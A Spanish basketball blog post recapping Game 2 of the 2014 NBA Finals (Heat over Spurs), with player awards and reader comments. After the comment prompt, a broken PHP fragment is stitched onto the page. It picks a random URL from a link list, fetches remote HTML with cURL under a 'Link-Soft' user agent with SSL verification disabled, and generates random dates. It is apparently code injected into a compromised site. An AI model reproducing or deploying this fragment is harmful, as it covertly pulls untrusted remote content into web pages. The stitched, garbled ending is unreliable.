La Crónica: Marcar la diferencia

09 de June de 2014 por TheDeerHunter

Esta vez no hubo problemas con el aire acondicionado. No se dieron temperaturas extremas. No hubo calambres que frenaran a la bestia.

Lebron James y los Heat no tienen por costumbre perder dos veces consecutivas. Llevan 46 partidos de playoffs sin hacerlo. Esperábamos una reacción tras lo ocurrido en el primero y por eso nos sorprendió el discreto comienzo de los hombre de Spoelstra. Los Spurs llegaban a ponerse 11 puntos arriba al principio del 2ª cuarto gracias al buen papel de su Big Three y al control que ejercieron sobre Lebron y Wade (2 puntos entre ambos). Sin embargo, a partir de ese momento llegó la avalancha… Aquello de “hago lo que quiero, cuando quiero…”. LeBron volvía a pista tras un breve descanso y anotaba 11 puntos para igualar el choque antes del descanso. Los Spurs sufrían su primer colapso.

En el tercer cuarto no aflojó nadie. Fue un periodo de intercambio de golpes fabuloso. Se llegó al último con la máxima igualdad hasta que Mario Chalmers le propinó un codazo a Tony Parker sin venir a cuento. Flagrante y 2 tiros libres más posesión que en lugar de abrir brecha derivarían en 4 fallos consecutivos desde la línea de los Spurs. Lebron aprovechó el regalo con un triple que ponía los suyos por delante. El hecho de pasar de verse 6 arriba a 1 por debajo marcó psicológicamente a los tejanos que llegaron a los últimos 9 segundos con una desventaja de 5 puntos. De nada iba a servir el último triple de Manudo.

Los campeones fueron sutilmente superiores a pesar del 157º doble-doble en playoffs de Tim Duncan (igualando el récord absoluto de Magic Johnson). Lanzaron con un comodísimo 54%, ganaron de forma inesperada los rebotes… e incluso disfrutaron de una aportación más variada que los Spurs. Estos sólo disfrutaron de una anotación sólida de los tres de siempre, con extraños instantes de atasco significativo. Echarán particularmente de menos los 8 tiros libres que fallaron. Más inoportunos imposible.

La serie viaja a Miami, dominada a los puntos por los campeones. 

PREMIOS

MVP: Lo pasado, pasado está. Los calambres del jueves no hicieron acto de presencia y Lebron James (35p – 10r) se encargó de igualar la eliminatoria. Tremenda exhibición en los últimos 3 cuartos del partido.

Sorpresa: En el primer cuarto fueron Rashard Lewis (14p) y Chris Bosh (18p) los que mantuvieron a los suyos en el partido. Y cuando apareció Lebron se conviertieron en los perfectos escuderos.

Decepción: Tim Duncan, Tony Parker y Manu Ginobili cumplieron pero se vieron demasiado solos. Los Danny Green, Marco Belinelli, Patty Mills… No tuvieron su día.

Esfuerzo en vano: El del Big Three de los Spurs, con mención especial al gran Tim Duncan. Tiene a tiro superar a Magic. Nadie duda de que lo conseguirá.

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. Albertis dice:
    #1

    Buenas,
    Totalmente de acuerdo, la flagrante a Parker (este Chalmers tiene unos arrebatos de animal), los cuatro tiros libres fallados y el triple de LeBron fueron un golpe moral a pesar que quedaba mucho tiempo y creo que lo arrastraron hasta el final. Vaya partido de James y como le tiene hecha la cruz el amigo Bosh a la esquinita!!
    Aposté dinero por los Heat campeones y aún así sigo cruzando los dedos para que ganen los Spurs, pero me “temo” que ganará la cabeza al corazón. (Sí, yo también era de los que odiaban a los Spurs hace 8 o 9 años)
    Saludos.

      Citar

  2. Rompe dice:
    #2

    Está un poco dormido el foro, justo en las finales, que se echan en falta las opiniones expertas! Espero que se animen, que se pone la cosa muy interesante.

      Citar

  3. Ruxixon dice:
    #3

    Simply the best! Vaya partidazo de “The King”

      Citar

  4. Esteban dice:
    #4

    vaya ayuda ha dado Lewius, siempre confie que con un rol hiper secundario,gracias a su tamaño y algo de experiencia siendo “ala pivote” podria ser mas util que battier en ese puesto

      Citar

  5. Viva_Dirk dice:
    #5

    Partido sublime de Lebron, van muchos en playoffs y unos cuantos en las finales. Cada vez acercandose mas a los intocables de la historia.

    Vistos los 2 primeros partidos Miami me parece favorito. El primero lo pierden a raíz de los calambres de Lebron, y hasta entonces lo habían tenido igualadísimo, ayer con un Wade al tran tran y sólo 12 puntos del banco se llevaron el partido y nuevamente no estuvieron nunca descolgados. Gran nivel de Bosh y una defensa que aprieta mucho cuando toca.

    Por los Spurs, Duncan sigue a lo suyo y Manu&Parker están jugando muy bien, pero la diferencia a su favor la tiene que marcar el resto, la lucha de ‘big threes’ quedó 67-58 para Miami que es algo que seguro firman para cada partido, pero aunque Diaw y Splitter jugaron muy bien faltó acierto en los secuandarios, y piernas en defensa en general en momentos puntuales.

    Con todo el partido se decidió en detalles y la eliminatoria será preciosa e igualada, pero hoy pinta mejor para Miami.

      Citar

  6. Esteban dice:
    #6

    comparto con dirk, mucho mejor Miami, jugando de visitante y al ritmo que le imponen los Spurs, siguen ganandi con Ley ajena

    Lebron es el diferencial, por muy bien que jueguen todos los demas jugadores de la cancha, el unico que marca una diferencia grande, que aparece cuando es necesario y anota casi cuando se lo propone es Lebron

    de hecho, creo que si fuera egosita y jugara para hacers sus numeros, entre libres y algunso tiros mas forzados, andaria en lo 40 cada partido, simplmente superior a los demas jugadores de esta serie

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>